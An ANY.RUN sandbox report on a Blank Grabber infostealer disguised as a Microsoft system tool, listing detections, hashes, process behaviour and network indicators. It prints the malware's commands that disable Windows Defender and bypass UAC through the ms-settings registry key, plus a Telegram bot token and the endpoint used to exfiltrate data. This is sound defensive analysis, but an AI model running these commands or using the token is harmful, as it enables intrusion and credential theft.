File name:

enigma.tech.exe

Full analysis: https://app.any.run/tasks/e9212f0c-de3f-4425-a39e-f70267591768
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Malware Trends Tracker     >>>
Analysis date: October 03, 2024, 14:33:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
uac
evasion
telegram
blankgrabber
stealer
exfiltration
pyinstaller
discordgrabber
generic
ims-api
growtopia
susp-powershell
umbralstealer
upx
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5:

6F451425173B4AFD358FDB80A0E82D70

SHA1:

F36B9AEF8C1A8A60DA9E418190353541445D823F

SHA256:

920E6F84332A744CAFB917F6E94356E1FD247BEC36D85B06F8A7B80A942C5B96

SSDEEP:

98304:E6Cg6ombrO47fz9hluqG9yeFyOnace7EewAV33T/1GfFH42UPeOHWZiI0FGGHLwn:PANE/gi7yo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • BlankGrabber has been detected

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 1772)

    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 6572)

    • Adds path to the Windows Defender exclusion list

      • enigma.tech.exe (PID: 2032)
      • cmd.exe (PID: 6028)

    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 2776)
      • MpCmdRun.exe (PID: 6196)

    • Windows Defender preferences modified via 'Set-MpPreference'

      • cmd.exe (PID: 2776)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2080)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 4472)

    • DISCORDGRABBER has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

    • GROWTOPIA has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

    • UMBRALSTEALER has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

    • Stealers network behavior

      • enigma.tech.exe (PID: 2032)

    • BLANKGRABBER has been detected (SURICATA)

      • enigma.tech.exe (PID: 2032)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Starts a Microsoft application from unusual location

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • The process drops C-runtime libraries

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Executable content was dropped or overwritten

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)
      • csc.exe (PID: 6284)

    • Process drops python dynamic module

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Application launched itself

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)

    • Changes default file association

      • reg.exe (PID: 1772)

    • Starts CMD.EXE for commands execution

      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 2032)

    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 3324)
      • cmd.exe (PID: 6916)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2028)
      • cmd.exe (PID: 1060)
      • cmd.exe (PID: 4056)

    • Found strings related to reading or modifying Windows Defender settings

      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 2032)

    • Get information on the list of running processes

      • enigma.tech.exe (PID: 2032)
      • cmd.exe (PID: 6556)
      • cmd.exe (PID: 4664)
      • cmd.exe (PID: 2224)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 2776)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2776)
      • cmd.exe (PID: 6028)
      • cmd.exe (PID: 4472)
      • cmd.exe (PID: 2352)
      • cmd.exe (PID: 2420)
      • cmd.exe (PID: 6644)
      • cmd.exe (PID: 7140)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 2776)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6028)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 6264)
      • cmd.exe (PID: 6292)

    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 6760)
      • cmd.exe (PID: 3324)
      • cmd.exe (PID: 4712)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 4472)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 4472)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 4472)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6284)

    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 6028)

    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 3396)

    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 6436)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • enigma.tech.exe (PID: 2032)

    • Checks for external IP

      • svchost.exe (PID: 2256)
      • enigma.tech.exe (PID: 2032)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • enigma.tech.exe (PID: 2032)

  • INFO

    • Reads the computer name

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • Checks supported languages

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • Create files in a temporary directory

      • enigma.tech.exe (PID: 1568)
      • enigma.tech.exe (PID: 5072)
      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • The process uses the downloaded file

      • cmd.exe (PID: 1712)

    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 6572)
      • WMIC.exe (PID: 6008)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 652)

    • PyInstaller has been detected (YARA)

      • enigma.tech.exe (PID: 488)
      • enigma.tech.exe (PID: 2032)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • enigma.tech.exe (PID: 2032)

    • UPX packer has been detected

      • enigma.tech.exe (PID: 2032)

    • Attempting to use instant messaging service

      • enigma.tech.exe (PID: 2032)
      • svchost.exe (PID: 2256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

ims-api

(PID) Process(2032) enigma.tech.exe
Telegram-Tokens (1)7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ
Telegram-Info-Links
7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ
Get info about bothttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/getMe
Get incoming updateshttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/getUpdates
Get webhookhttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/deleteWebhook?drop_pending_updates=true
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:09:30 13:49:51+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.4
CodeSize: 172032
InitializedDataSize: 94208
UninitializedDataSize: -
EntryPoint: 0xcdb0
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 10.0.22621.2506
ProductVersionNumber: 10.0.22621.2506
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: System Clone Tool
FileVersion: 10.0.22621.2506 (WinBuild.160101.0800)
InternalName: Setupcl.EXE
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: Setupcl.EXE
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.22621.2506
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
207
Monitored processes
91
Malicious processes
8
Suspicious processes
3

Behavior graph

Click at the process to see the details
start #BLANKGRABBER enigma.tech.exe enigma.tech.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe THREAT enigma.tech.exe cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs #BLANKGRABBER enigma.tech.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs mshta.exe no specs tasklist.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs svchost.exe cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs tasklist.exe no specs powershell.exe no specs mpcmdrun.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
376powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
488"C:\Users\admin\Desktop\enigma.tech.exe" C:\Users\admin\Desktop\enigma.tech.exe
ComputerDefaults.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
System Clone Tool
Exit code:
0
Version:
10.0.22621.2506 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\enigma.tech.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
652mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ready!', 0, 'lxrd.', 48+16);close()"C:\Windows\System32\mshta.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
908C:\WINDOWS\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Ready!', 0, 'lxrd.', 48+16);close()""C:\Windows\System32\cmd.exeenigma.tech.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1060C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"C:\Windows\System32\cmd.exeenigma.tech.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1308wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:textC:\Windows\System32\wevtutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Eventing Command Line Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wevtutil.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\combase.dll
1568"C:\Users\admin\Desktop\enigma.tech.exe" C:\Users\admin\Desktop\enigma.tech.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
System Clone Tool
Exit code:
0
Version:
10.0.22621.2506 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\desktop\enigma.tech.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
1656tasklist /FO LISTC:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1712C:\WINDOWS\system32\cmd.exe /c "computerdefaults --nouacbypass"C:\Windows\System32\cmd.exeenigma.tech.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1772reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
43 082
Read events
43 073
Write events
5
Delete events
4

Modification events

(PID) Process:(1772) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute
Value:
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6572) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:delete keyName:(default)
Value:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open
Operation:delete keyName:(default)
Value:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell
Operation:delete keyName:(default)
Value:
(PID) Process:(5964) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings
Operation:delete keyName:(default)
Value:
Executable files
37
Suspicious files
8
Text files
36
Unknown types
6

Dropped files

PID
Process
Filename
Type
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\VCRUNTIME140.dllexecutable
MD5:870FEA4E961E2FBD00110D3783E529BE
SHA256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\sqlite3.dllexecutable
MD5:ABE8EEC6B8876DDAD5A7D60640664F40
SHA256:26FC80633494181388CF382F417389C59C28E9FFEDDE8C391D95EDDB6840B20D
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\rar.exeexecutable
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_hashlib.pydexecutable
MD5:7EDB6C172C0E44913E166ABB50E6FBA6
SHA256:258AD0D7E8B2333B4B260530E14EBE6ABD12CAE0316C4549E276301E5865B531
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_queue.pydexecutable
MD5:F1E7C157B687C7E041DEADD112D61316
SHA256:D92EADB90AED96ACB5FAC03BC79553F4549035EA2E9D03713D420C236CD37339
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_lzma.pydexecutable
MD5:71F0B9F90AA4BB5E605DF0EA58673578
SHA256:D0E10445281CF3195C2A1AA4E0E937D69CAE07C492B74C9C796498DB33E9F535
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_sqlite3.pydexecutable
MD5:72A0715CB59C5A84A9D232C95F45BF57
SHA256:D125E113E69A49E46C5534040080BDB35B403EB4FF4E74ABF963BCE84A6C26AD
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_bz2.pydexecutable
MD5:83B5D1943AC896A785DA5343614B16BC
SHA256:BF79DDBFA1CC4DF7987224EE604C71D9E8E7775B9109BF4FF666AF189D89398A
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_ctypes.pydexecutable
MD5:7ECC651B0BCF9B93747A710D67F6C457
SHA256:B43963B0883BA2E99F2B7DD2110D33063071656C35E6575FCA203595C1C32B1A
1568enigma.tech.exeC:\Users\admin\AppData\Local\Temp\_MEI15682\_decimal.pydexecutable
MD5:0CFE09615338C6450AC48DD386F545FD
SHA256:A0FA3AD93F98F523D189A8DE951E42F70CC1446793098151FC50BA6B5565F2E3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
31
DNS requests
10
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2356
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
204
216.58.206.35:443
https://gstatic.com/generate_204
unknown
unknown
2032
enigma.tech.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
shared
2032
enigma.tech.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
shared
POST
200
149.154.167.99:443
https://api.telegram.org/bot7546185290:AAFAb1YwVpJf1DhKApBOmWQ8G4ULHMAQQvQ/sendDocument
unknown
binary
1.67 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2356
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3888
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
2356
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2032
enigma.tech.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
shared
2356
svchost.exe
52.167.249.196:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2032
enigma.tech.exe
216.58.212.131:443
gstatic.com
GOOGLE
US
whitelisted
2032
enigma.tech.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
shared

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
  • 52.167.249.196
whitelisted
google.com
  • 142.250.185.238
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
blank-y4ite.in
unknown
ip-api.com
  • 208.95.112.1
shared
gstatic.com
  • 216.58.212.131
whitelisted
api.telegram.org
  • 149.154.167.220
shared

Threats

PID
Process
Class
Message
2256
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2256
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2032
enigma.tech.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2256
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2256
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
2032
enigma.tech.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2032
enigma.tech.exe
A Network Trojan was detected
STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
2032
enigma.tech.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
Successful Credential Theft Detected
SUSPICIOUS [ANY.RUN] Host Name Exfiltration Atempt
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
enigma.tech.exe